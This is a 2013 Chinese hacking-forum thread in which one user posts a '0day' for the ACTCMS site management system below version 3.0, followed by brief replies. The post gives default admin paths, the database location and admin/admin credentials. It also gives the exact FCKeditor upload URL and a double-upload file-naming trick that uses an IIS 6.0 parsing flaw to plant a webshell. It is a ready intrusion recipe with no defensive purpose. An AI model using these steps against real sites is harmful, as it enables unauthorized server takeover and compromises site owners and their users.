Diana 发表于 2013-9-2 22:32:23

actcms网站管理系统漏洞0day [无聊的文章]

漏洞版本:actcms3.0以下版本
默认后台路径:admin/
默认数据库:App_Data/DataBase.mdb
默认账户:admin
默认密码: admin
利用点:FCK编译器
漏洞界面:
admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=%2Fadmin%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx
利用FCK 2次上传
可上传XXX.asa;.jpg类型
上传后会变成XXX_asa;.jpg
再次上传XXX.asa;.jpg
即可成为XXX.asa;(1).jpg
利用IIS6.0解析漏洞即可拿到webshell

Andre 发表于 2013-9-2 23:00:34

{:soso_e179:}

a88166666 发表于 2013-9-3 13:19:39

mojitingliu 发表于 2013-9-3 15:32:26

入库收藏了
页: [1]
查看完整版本: actcms网站管理系统漏洞0day [无聊的文章]